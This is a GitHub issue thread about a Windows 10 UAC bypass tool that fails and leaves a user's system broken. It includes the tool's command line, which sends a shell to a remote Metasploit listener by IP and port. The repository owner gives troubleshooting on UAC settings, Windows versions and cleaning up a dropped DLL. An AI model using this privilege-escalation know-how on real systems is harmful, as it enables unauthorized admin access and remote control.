Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

not work in windows 10 x64 ?????? #2

Open
gearcapitan opened this issue Aug 30, 2016 · 6 comments
Open

not work in windows 10 x64 ?????? #2

gearcapitan opened this issue Aug 30, 2016 · 6 comments

Comments

@gearcapitan
Copy link

C:\Users\Pentesting>C:\Users\Pentesting\Desktop\TpmInitUACBypass.exe 192.168.0.66 668 msf


/_ / __ _ / /_ () /
/ / / _ / ' / // _ / / **/
/
/ / .**/////////__/
/
/
UAC Suicide Squad
By Cn33liz 2016

[] Dropping needed DLL's from memory -> Done!
[
] Write parameters into config file -> Done!
[] Now injecting the IFileOperation DLL into explorer.exe process....
[
] And use the IFileOperation::CopyItem method to copy our DLL -> Oops something went wrong!

.................................
other errors

https://gyazo.com/c207fa6d0cd51ef0b549dac477689d14
https://gyazo.com/b54b776240db79138c328771e16b91ae

@Cn33liz
Copy link
Owner

Cn33liz commented Aug 30, 2016

Are you sure your user is member of the local administrator group?
How are the UAC settings (This bypass only works if UAC setting are default)?

Do you have the latest Windows 10 Anniversary update installed?
Otherwise you need this version of the bypass:
https://github.com/Cn33liz/TpmInitUACAnniversaryBypass

@gearcapitan
Copy link
Author

gearcapitan commented Aug 30, 2016

first answer, yes
second answer, yes
third answer, yes

and also not only that, besides also am now having problems with my windows, so the message wbemprox.dll error, some programs no longer start because they say they do not have sufficient permissions to start the service or application, although right click, and run as administrator, some applications do not work, I can not not install other because it says that the service can not start due to lack of permits, as I fix it? and neither my virtual machines can run: '(,

https://gyazo.com/dc83b6cc9c467ffdfd7efbe781ffd81e

@Cn33liz
Copy link
Owner

Cn33liz commented Aug 30, 2016

The problem is that you probably used the wrong version of the bypass (you needed the Anniversary version) , so the dll could not remove itself.
Please remove the wbemcomn.dll from the C:\windows\system32\wbem folder.
If you cannot remove it (because it's in use), please reboot Windows in command prompt modus and delete the file. Next time; please read the readme before running tools like this.

@gearcapitan
Copy link
Author

and I did, but still the problem persists, some srevicios not start due to lack of privileges, it's like now my pc was a standard user even if this in the local administrator account, still can not reinstall vmware workstation, the thing is maso less so, so qui did was done as is the manual, my windows if the version of anniversary, but when you run the program did not send me the shell, then thought to open a terminal as administrator to run the program as they so obiamente haria bypass the system, but depues that the problems started
https://gyazo.com/fc1b9e7a5b15c55a3a72353190289737

@Cn33liz
Copy link
Owner

Cn33liz commented Aug 30, 2016

I don't know what the problem is with your system. If you succesfully deleted the wbemcomn dll from c:\windows\system32\wbem, then you shouldn't have any problems caused by running this tool. If you want to test this tool, please read the readme or my blogpost and use the correct version. Always make snapshots from vm's before testing, or create a restore point within Windows, so if something goes wrong you can always restore to a previous working state.

@gearcapitan
Copy link
Author

gearcapitan commented Sep 1, 2016

hello me again, sorry for the pain this time compile the code manually in visual studio and yet the message of the picture I get, and I get on my local machine and on my virtual machines, forget all this that postie that and fix it, but I mean not simply step !, Oops something went wrong recivi be that any upgrade to patch the vulnerability? you can try more

hola yo otra vez, perdon por el fastidio, esta vez compile el codigo manualmente en visual studio y aun asi me sale el mensaje del la imagen, y me sale en mi maquina local y en mis maquinas virtuales, olvida todo lo anterior que postie eso ya lo arregle, pero osea simplemente no paso de Oops something went wrong!, sera que recivi alguna actualizacion que parcho la vulnerabilidad? que mas puedo intentar

https://gyazo.com/3ec9e3d1395f0d4b5729daff0ff9522f

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants